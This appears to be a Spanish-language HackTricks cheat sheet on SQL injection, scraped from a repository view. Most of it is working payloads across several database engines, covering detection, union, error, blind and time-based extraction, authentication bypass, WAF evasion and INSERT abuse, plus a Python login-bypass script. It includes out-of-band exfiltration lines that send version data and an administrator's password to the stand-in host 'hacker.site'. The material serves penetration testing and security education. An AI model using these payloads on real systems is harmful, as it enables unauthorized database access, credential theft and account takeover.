hacktricks/pentesting-web/sql-injection
2024-05-08 16:26:48 +00:00
..
mysql-injection Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00
postgresql-injection Translated ['README.md', 'binary-exploitation/rop-return-oriented-progra 2024-05-08 16:26:48 +00:00
sqlmap Translated ['README.md', 'binary-exploitation/rop-return-oriented-progra 2024-05-08 16:26:48 +00:00
cypher-injection-neo4j.md Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00
ms-access-sql-injection.md Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00
mssql-injection.md Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00
oracle-injection.md Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00
README.md Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00
sqlmap.md Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00

Inyección SQL

Aprende hacking en AWS desde cero hasta convertirte en un experto con htARTE (HackTricks AWS Red Team Expert)!

RootedCON es el evento de ciberseguridad más relevante en España y uno de los más importantes en Europa. Con la misión de promover el conocimiento técnico, este congreso es un punto de encuentro clave para profesionales de tecnología y ciberseguridad en todas las disciplinas.

{% embed url="https://www.rootedcon.com/" %}

¿Qué es la inyección SQL?

Una inyección SQL es una vulnerabilidad de seguridad que permite a los atacantes interferir con las consultas a la base de datos de una aplicación. Esta vulnerabilidad puede permitir a los atacantes ver, modificar o eliminar datos a los que no deberían tener acceso, incluida la información de otros usuarios o cualquier dato al que la aplicación pueda acceder. Tales acciones pueden resultar en cambios permanentes en la funcionalidad o contenido de la aplicación o incluso en la compromisión del servidor o denegación de servicio.

Detección del punto de entrada

Cuando un sitio parece ser vulnerable a la inyección SQL (SQLi) debido a respuestas inusuales del servidor a entradas relacionadas con SQLi, el primer paso es comprender cómo inyectar datos en la consulta sin interrumpirla. Esto requiere identificar el método para escapar del contexto actual de manera efectiva. Estos son algunos ejemplos útiles:

[Nothing]
'
"
`
')
")
`)
'))
"))
`))

Entonces, necesitas saber cómo arreglar la consulta para que no haya errores. Para arreglar la consulta puedes ingresar datos para que la consulta anterior acepte los nuevos datos, o simplemente puedes ingresar tus datos y agregar un símbolo de comentario al final.

Ten en cuenta que si puedes ver mensajes de error o puedes detectar diferencias cuando una consulta está funcionando y cuando no lo está, esta fase será más fácil.

Comentarios

MySQL
#comment
-- comment     [Note the space after the double dash]
/*comment*/
/*! MYSQL Special SQL */

PostgreSQL
--comment
/*comment*/

MSQL
--comment
/*comment*/

Oracle
--comment

SQLite
--comment
/*comment*/

HQL
HQL does not support comments

Confirmación con operaciones lógicas

Un método confiable para confirmar una vulnerabilidad de inyección SQL implica ejecutar una operación lógica y observar los resultados esperados. Por ejemplo, un parámetro GET como ?username=Peter que produce un contenido idéntico cuando se modifica a ?username=Peter' o '1'='1 indica una vulnerabilidad de inyección SQL.

De manera similar, la aplicación de operaciones matemáticas sirve como una técnica de confirmación efectiva. Por ejemplo, si al acceder a ?id=1 y ?id=2-1 se obtiene el mismo resultado, es indicativo de una inyección SQL.

Ejemplos que demuestran la confirmación mediante operaciones lógicas:

page.asp?id=1 or 1=1 -- results in true
page.asp?id=1' or 1=1 -- results in true
page.asp?id=1" or 1=1 -- results in true
page.asp?id=1 and 1=2 -- results in false

Esta lista de palabras fue creada para intentar confirmar inyecciones SQL de la manera propuesta:

{% file src="../../.gitbook/assets/sqli-logic.txt" %}

Confirmación con Temporización

En algunos casos no notarás ningún cambio en la página que estás probando. Por lo tanto, una buena manera de descubrir inyecciones SQL ciegas es hacer que la base de datos realice acciones que tengan un impacto en el tiempo que la página necesita para cargarse.
Por lo tanto, vamos a concatenar en la consulta SQL una operación que llevará mucho tiempo en completarse:

MySQL (string concat and logical ops)
1' + sleep(10)
1' and sleep(10)
1' && sleep(10)
1' | sleep(10)

PostgreSQL (only support string concat)
1' || pg_sleep(10)

MSQL
1' WAITFOR DELAY '0:0:10'

Oracle
1' AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
1' AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10)

SQLite
1' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
1' AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))

En algunos casos, las funciones de espera no estarán permitidas. En lugar de usar esas funciones, podrías hacer que la consulta realice operaciones complejas que llevarán varios segundos. Los ejemplos de estas técnicas se comentarán por separado en cada tecnología (si las hay).

Identificación del Back-end

La mejor manera de identificar el back-end es intentar ejecutar funciones de los diferentes back-ends. Puedes usar las funciones de espera de la sección anterior o estas (tabla de payloadsallthethings:

["conv('a',16,2)=conv('a',16,2)"                   ,"MYSQL"],
["connection_id()=connection_id()"                 ,"MYSQL"],
["crc32('MySQL')=crc32('MySQL')"                   ,"MYSQL"],
["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)"       ,"MSSQL"],
["@@CONNECTIONS>0"                                 ,"MSSQL"],
["@@CONNECTIONS=@@CONNECTIONS"                     ,"MSSQL"],
["@@CPU_BUSY=@@CPU_BUSY"                           ,"MSSQL"],
["USER_ID(1)=USER_ID(1)"                           ,"MSSQL"],
["ROWNUM=ROWNUM"                                   ,"ORACLE"],
["RAWTOHEX('AB')=RAWTOHEX('AB')"                   ,"ORACLE"],
["LNNVL(0=123)"                                    ,"ORACLE"],
["5::int=5"                                        ,"POSTGRESQL"],
["5::integer=5"                                    ,"POSTGRESQL"],
["pg_client_encoding()=pg_client_encoding()"       ,"POSTGRESQL"],
["get_current_ts_config()=get_current_ts_config()" ,"POSTGRESQL"],
["quote_literal(42.5)=quote_literal(42.5)"         ,"POSTGRESQL"],
["current_database()=current_database()"           ,"POSTGRESQL"],
["sqlite_version()=sqlite_version()"               ,"SQLITE"],
["last_insert_rowid()>1"                           ,"SQLITE"],
["last_insert_rowid()=last_insert_rowid()"         ,"SQLITE"],
["val(cvar(1))=1"                                  ,"MSACCESS"],
["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0"               ,"MSACCESS"],
["cdbl(1)=cdbl(1)"                                 ,"MSACCESS"],
["1337=1337",   "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
["'i'='i'",     "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],

También, si tienes acceso a la salida de la consulta, podrías hacer que imprima la versión de la base de datos.

{% hint style="info" %} A continuación vamos a discutir diferentes métodos para explotar diferentes tipos de Inyección SQL. Utilizaremos MySQL como ejemplo. {% endhint %}

Identificación con PortSwigger

{% embed url="https://portswigger.net/web-security/sql-injection/cheat-sheet" %}

Explotando Union Based

Detectando el número de columnas

Si puedes ver la salida de la consulta, esta es la mejor manera de explotarla.
En primer lugar, necesitamos averiguar el número de columnas que está devolviendo la solicitud inicial. Esto se debe a que ambas consultas deben devolver el mismo número de columnas.
Normalmente se utilizan dos métodos para este propósito:

Order/Group by

Para determinar el número de columnas en una consulta, ajusta incrementalmente el número utilizado en las cláusulas ORDER BY o GROUP BY hasta que se reciba una respuesta falsa. A pesar de las funcionalidades distintas de GROUP BY y ORDER BY dentro de SQL, ambos se pueden utilizar de manera idéntica para determinar el recuento de columnas de la consulta.

1' ORDER BY 1--+    #True
1' ORDER BY 2--+    #True
1' ORDER BY 3--+    #True
1' ORDER BY 4--+    #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+    True
1' GROUP BY 1--+    #True
1' GROUP BY 2--+    #True
1' GROUP BY 3--+    #True
1' GROUP BY 4--+    #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+    True

UNION SELECT

Selecciona más y más valores nulos hasta que la consulta sea correcta:

1' UNION SELECT null-- - Not working
1' UNION SELECT null,null-- - Not working
1' UNION SELECT null,null,null-- - Worked

Extraer nombres de bases de datos, nombres de tablas y nombres de columnas

En los siguientes ejemplos vamos a recuperar el nombre de todas las bases de datos, el nombre de la tabla de una base de datos, y los nombres de las columnas de la tabla:

#Database names
-1' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata

#Tables of a database
-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,table_name,0x7C) fRoM information_schema.tables wHeRe table_schema=[database]

#Column names
-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,column_name,0x7C) fRoM information_schema.columns wHeRe table_name=[table name]

Existen diferentes formas de descubrir estos datos en cada base de datos, pero siempre se sigue la misma metodología.

Explotando Union Based Oculto

Cuando la salida de una consulta es visible, pero una inyección basada en uniones parece inalcanzable, significa la presencia de una inyección basada en uniones ocultas. Esta situación a menudo conduce a una inyección ciega. Para transformar una inyección ciega en una basada en uniones, es necesario discernir la consulta de ejecución en el backend.

Esto se puede lograr mediante el uso de técnicas de inyección ciega junto con las tablas predeterminadas específicas de su Sistema de Gestión de Bases de Datos (DBMS) objetivo. Para comprender estas tablas predeterminadas, se recomienda consultar la documentación del DBMS objetivo.

Una vez que se ha extraído la consulta, es necesario adaptar su carga útil para cerrar de forma segura la consulta original. Posteriormente, se agrega una consulta de unión a su carga útil, facilitando la explotación de la inyección basada en uniones recién accesible.

Para obtener información más detallada, consulte el artículo completo disponible en Healing Blind Injections.

Explotando basado en Errores

Si por alguna razón no puedes ver la salida de la consulta pero puedes ver los mensajes de error, puedes utilizar estos mensajes de error para filtrar datos de la base de datos.
Siguiendo un flujo similar al de la explotación basada en Uniones, podrías lograr extraer la base de datos.

(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

Explotando Blind SQLi

En este caso no puedes ver los resultados de la consulta o los errores, pero puedes distinguir cuando la consulta devuelve una respuesta verdadera o falsa porque hay diferentes contenidos en la página.
En este caso, puedes abusar de ese comportamiento para volcar la base de datos carácter por carácter:

?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables = 'A'

Explotando Error Blind SQLi

Este es el mismo caso que antes pero en lugar de distinguir entre una respuesta verdadera/falsa de la consulta, puedes distinguir entre un error en la consulta SQL o no (quizás porque el servidor HTTP se bloquea). Por lo tanto, en este caso puedes forzar un error SQL cada vez que adivines correctamente el carácter:

AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -

Explotando SQLi basado en tiempo

En este caso no hay ninguna forma de distinguir la respuesta de la consulta basada en el contexto de la página. Sin embargo, puedes hacer que la página tome más tiempo en cargar si el carácter adivinado es correcto. Ya hemos visto esta técnica en uso antes para confirmar una vulnerabilidad de SQLi.

1 and (select sleep(10) from users where SUBSTR(table_name,1,1) = 'A')#

Consultas Apiladas

Puedes usar consultas apiladas para ejecutar múltiples consultas en sucesión. Ten en cuenta que, si bien las consultas subsiguientes se ejecutan, los resultados no se devuelven a la aplicación. Por lo tanto, esta técnica se utiliza principalmente en relación con vulnerabilidades ciegas donde puedes usar una segunda consulta para desencadenar una búsqueda DNS, un error condicional o un retraso en el tiempo.

Oracle no admite consultas apiladas. MySQL, Microsoft y PostgreSQL las admiten: CONSULTA-1-AQUÍ; CONSULTA-2-AQUÍ

Explotación Fuera de Banda

Si ningún otro método de explotación funcionó, puedes intentar hacer que la base de datos exfiltre la información a un host externo controlado por ti. Por ejemplo, a través de consultas DNS:

select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));

Exfiltración de datos fuera de banda a través de XXE

a' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.hacker.site/"> %remote;]>'),'/l') FROM dual-- -

Explotación Automatizada

Consulta la Hoja de Trucos de SQLMap para explotar una vulnerabilidad de SQLi con sqlmap.

Información Específica de Tecnología

Ya hemos discutido todas las formas de explotar una vulnerabilidad de Inyección SQL. Encuentra algunos trucos más dependientes de la tecnología de la base de datos en este libro:

O encontrarás muchos trucos relacionados con: MySQL, PostgreSQL, Oracle, MSSQL, SQLite y HQL en https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection

RootedCON es el evento de ciberseguridad más relevante en España y uno de los más importantes en Europa. Con la misión de promover el conocimiento técnico, este congreso es un punto de encuentro crucial para profesionales de la tecnología y ciberseguridad en todas las disciplinas.

{% embed url="https://www.rootedcon.com/" %}

Bypass de Autenticación

Lista para intentar evadir la funcionalidad de inicio de sesión:

{% content-ref url="../login-bypass/sql-login-bypass.md" %} sql-login-bypass.md {% endcontent-ref %}

Bypass de Autenticación de Hash en Bruto

"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"

Este query muestra una vulnerabilidad cuando se utiliza MD5 con true para la salida en bruto en comprobaciones de autenticación, lo que hace que el sistema sea susceptible a la inyección SQL. Los atacantes pueden explotar esto creando entradas que, al ser hasheadas, producen partes inesperadas de comandos SQL, lo que lleva a un acceso no autorizado.

md5("ffifdyop", true) = 'or'6<EFBFBD>]<EFBFBD><EFBFBD>!r,<EFBFBD><EFBFBD>b<EFBFBD>
sha1("3fDf ", true) = Q<EFBFBD>u'='<EFBFBD>@<EFBFBD>[<EFBFBD>t<EFBFBD>- o<EFBFBD><EFBFBD>_-!

Bypass de autenticación de hash inyectado

admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'

Lista recomendada:

Debes usar como nombre de usuario cada línea de la lista y como contraseña siempre: Pass1234.
(Estos payloads también están incluidos en la lista grande mencionada al principio de esta sección)

{% file src="../../.gitbook/assets/sqli-hashbypass.txt" %}

GBK Autenticación Bypass

SI ' está siendo escapado, puedes usar %A8%27, y cuando ' es escapado se creará: 0xA80x5c0x27 (╘')

%A8%27 OR 1=1;-- 2
%8C%A8%27 OR 1=1-- 2
%bf' or 1=1 -- --

Script de Python:

import requests
url = "http://example.com/index.php"
cookies = dict(PHPSESSID='4j37giooed20ibi12f3dqjfbkp3')
datas = {"login": chr(0xbf) + chr(0x27) + "OR 1=1 #", "password":"test"}
r = requests.post(url, data = datas, cookies=cookies, headers={'referrer':url})
print r.text

Inyección políglota (multicontext)

SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/

Declaración Insert

Modificar contraseña de objeto/usuario existente

Para hacerlo, debes intentar crear un nuevo objeto con el nombre del "objeto maestro" (probablemente admin en caso de usuarios) modificando algo:

  • Crear usuario con el nombre: AdMIn (combinando letras mayúsculas y minúsculas)
  • Crear un usuario con el nombre: admin=
  • Ataque de Truncamiento SQL (cuando hay algún tipo de límite de longitud en el nombre de usuario o correo electrónico) --> Crear usuario con el nombre: admin [muchos espacios]

Ataque de Truncamiento SQL

Si la base de datos es vulnerable y el número máximo de caracteres para el nombre de usuario es, por ejemplo, 30 y deseas suplantar al usuario admin, intenta crear un nombre de usuario llamado: "admin [30 espacios] a" y cualquier contraseña.

La base de datos verificará si el nombre de usuario introducido existe dentro de la base de datos. Si no, cortará el nombre de usuario al número máximo de caracteres permitidos (en este caso a: "admin [25 espacios]") y luego eliminará automáticamente todos los espacios al final actualizando dentro de la base de datos al usuario "admin" con la nueva contraseña (puede aparecer algún error, pero no significa que no haya funcionado).

Más información: https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html & https://resources.infosecinstitute.com/sql-truncation-attack/#gref

Nota: Este ataque ya no funcionará como se describe en las últimas instalaciones de MySQL. Aunque las comparaciones aún ignoran los espacios en blanco al final de forma predeterminada, intentar insertar una cadena que sea más larga que la longitud de un campo resultará en un error y la inserción fallará. Para obtener más información sobre esto, consulta: https://heinosass.gitbook.io/leet-sheet/web-app-hacking/exploitation/interesting-outdated-attacks/sql-truncation

Verificación basada en el tiempo de inserción de MySQL

Agrega tantos ','','' como consideres necesario para salir de la declaración VALUES. Si se produce un retraso, tienes una Inyección SQL.

name=','');WAITFOR%20DELAY%20'0:0:5'--%20-

ON DUPLICATE KEY UPDATE

La cláusula ON DUPLICATE KEY UPDATE en MySQL se utiliza para especificar acciones para que la base de datos tome cuando se intenta insertar una fila que resultaría en un valor duplicado en un índice UNIQUE o PRIMARY KEY. El siguiente ejemplo demuestra cómo esta característica puede ser explotada para modificar la contraseña de una cuenta de administrador:

Ejemplo de Inyección de Carga Útil:

Una carga útil de inyección podría ser creada de la siguiente manera, donde se intenta insertar dos filas en la tabla users. La primera fila es una distracción, y la segunda fila apunta al correo electrónico de un administrador existente con la intención de actualizar la contraseña:

INSERT INTO users (email, password) VALUES ("generic_user@example.com", "bcrypt_hash_of_newpassword"), ("admin_generic@example.com", "bcrypt_hash_of_newpassword") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_newpassword" -- ";

Cómo funciona:

  • La consulta intenta insertar dos filas: una para generic_user@example.com y otra para admin_generic@example.com.
  • Si la fila para admin_generic@example.com ya existe, se activa la cláusula ON DUPLICATE KEY UPDATE, instruyendo a MySQL para actualizar el campo password de la fila existente a "bcrypt_hash_of_newpassword".
  • En consecuencia, la autenticación puede intentarse utilizando admin_generic@example.com con la contraseña correspondiente al hash bcrypt ("bcrypt_hash_of_newpassword" representa el hash bcrypt de la nueva contraseña, que debe ser reemplazado por el hash real de la contraseña deseada).

Extraer información

Crear 2 cuentas al mismo tiempo

Cuando se intenta crear un nuevo usuario y se necesitan nombre de usuario, contraseña y correo electrónico:

SQLi payload:
username=TEST&password=TEST&email=TEST'),('otherUsername','otherPassword',(select flag from flag limit 1))-- -

A new user with username=otherUsername, password=otherPassword, email:FLAG will be created

Usando decimal o hexadecimal

Con esta técnica puedes extraer información creando solo 1 cuenta. Es importante tener en cuenta que no es necesario comentar nada.

Usando hex2dec y substr:

'+(select conv(hex(substr(table_name,1,6)),16,10) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'

Para obtener el texto puedes usar:

__import__('binascii').unhexlify(hex(215573607263)[2:])

Usando hex y replace (y substr):

'+(select hex(replace(replace(replace(replace(replace(replace(table_name,"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'

'+(select hex(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'

#Full ascii uppercase and lowercase replace:
'+(select hex(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%"),"z","&"),"J","'"),"K","`"),"L","("),"M",")"),"N","@"),"O","$$"),"Z","&&")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'

RootedCON es el evento de ciberseguridad más relevante en España y uno de los más importantes en Europa. Con la misión de promover el conocimiento técnico, este congreso es un punto de encuentro clave para profesionales de la tecnología y ciberseguridad en todas las disciplinas.

{% embed url="https://www.rootedcon.com/" %}

Inyección SQL enrutada

La inyección SQL enrutada es una situación en la que la consulta inyectable no es la que produce la salida, sino que la salida de la consulta inyectable va a la consulta que produce la salida. (Desde Paper)

Ejemplo:

#Hex of: -1' union select login,password from users-- a
-1' union select 0x2d312720756e696f6e2073656c656374206c6f67696e2c70617373776f72642066726f6d2075736572732d2d2061 -- a

Bypass de WAF

By passes iniciales desde aquí

Bypass sin espacios

Sin Espacios (%20) - bypass utilizando alternativas de espaciado

?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D--
?id=1%0Cand%0C1=1%0C--
?id=1%0Band%0B1=1%0B--
?id=1%0Aand%0A1=1%0A--
?id=1%A0and%A01=1%A0--

No Whitespace - bypass usando comentarios

En algunos casos, los filtros pueden estar configurados para bloquear ciertas palabras clave o caracteres, como 'OR' o '--', para prevenir inyecciones SQL. En tales situaciones, se puede intentar usar comentarios para evitar estas restricciones. Por ejemplo, en lugar de 'OR', se puede usar 'O/**/R', lo que permite que la consulta pase desapercibida para los filtros de palabras clave.

?id=1/*comment*/and/**/1=1/**/--

Sin espacios - eludir usando paréntesis

En algunos casos, es posible eludir las restricciones de entrada que prohíben el uso de espacios en una inyección SQL mediante el uso de paréntesis. Esto se puede lograr envolviendo las palabras clave y los operadores en paréntesis para evitar la necesidad de espacios. Por ejemplo, en lugar de usar UNION SELECT, se puede usar (UNION)SELECT para lograr el mismo resultado sin necesidad de espacios.

?id=(1)and(1)=(1)--

Sin comas de bypass

Sin Coma - bypass utilizando OFFSET, FROM y JOIN

LIMIT 0,1         -> LIMIT 1 OFFSET 0
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
SELECT 1,2,3,4    -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d

Saltos Genéricos

Lista negra utilizando palabras clave - saltar utilizando mayúsculas/minúsculas

?id=1 AND 1=1#
?id=1 AnD 1=1#
?id=1 aNd 1=1#

Lista negra utilizando palabras clave insensibles a mayúsculas y minúsculas - evitando usando un operador equivalente

AND   -> && -> %26%26
OR    -> || -> %7C%7C
=     -> LIKE,REGEXP,RLIKE, not < and not >
> X   -> not between 0 and X
WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())Then(table_name)END) -> group_concat(if(table_schema=database(),table_name,null))

Bypass de WAF con Notación Científica

Puedes encontrar una explicación más detallada de este truco en el blog de gosecure.
Básicamente puedes usar la notación científica de formas inesperadas para evadir el WAF:

-1' or 1.e(1) or '1'='1
-1' or 1337.1337e1 or '1'='1
' or 1.e('')=

Saltar la Restricción de Nombres de Columnas

En primer lugar, ten en cuenta que si la consulta original y la tabla de la que deseas extraer la bandera tienen la misma cantidad de columnas, podrías simplemente hacer: 0 UNION SELECT * FROM flag

Es posible acceder a la tercera columna de una tabla sin usar su nombre utilizando una consulta como la siguiente: SELECT F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;, por lo tanto, en una inyección sql se vería así:

# This is an example with 3 columns that will extract the column number 3
-1 UNION SELECT 0, 0, 0, F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;

O utilizando un bypass de coma:

# In this case, it's extracting the third value from a 4 values table and returning 3 values in the "union select"
-1 union select * from (select 1)a join (select 2)b join (select F.3 from (select * from (select 1)q join (select 2)w join (select 3)e join (select 4)r union select * from flag limit 1 offset 5)F)c

Este truco fue tomado de https://secgroup.github.io/2017/01/03/33c3ctf-writeup-shia/

Herramientas sugeridas para evadir WAF

{% embed url="https://github.com/m4ll0k/Atlas" %}

Otros Guías

Lista de Detección de Fuerza Bruta

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt" %}

RootedCON es el evento de ciberseguridad más relevante en España y uno de los más importantes en Europa. Con la misión de promover el conocimiento técnico, este congreso es un punto de encuentro crucial para profesionales de tecnología y ciberseguridad en todas las disciplinas.

{% embed url="https://www.rootedcon.com/" %}

Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!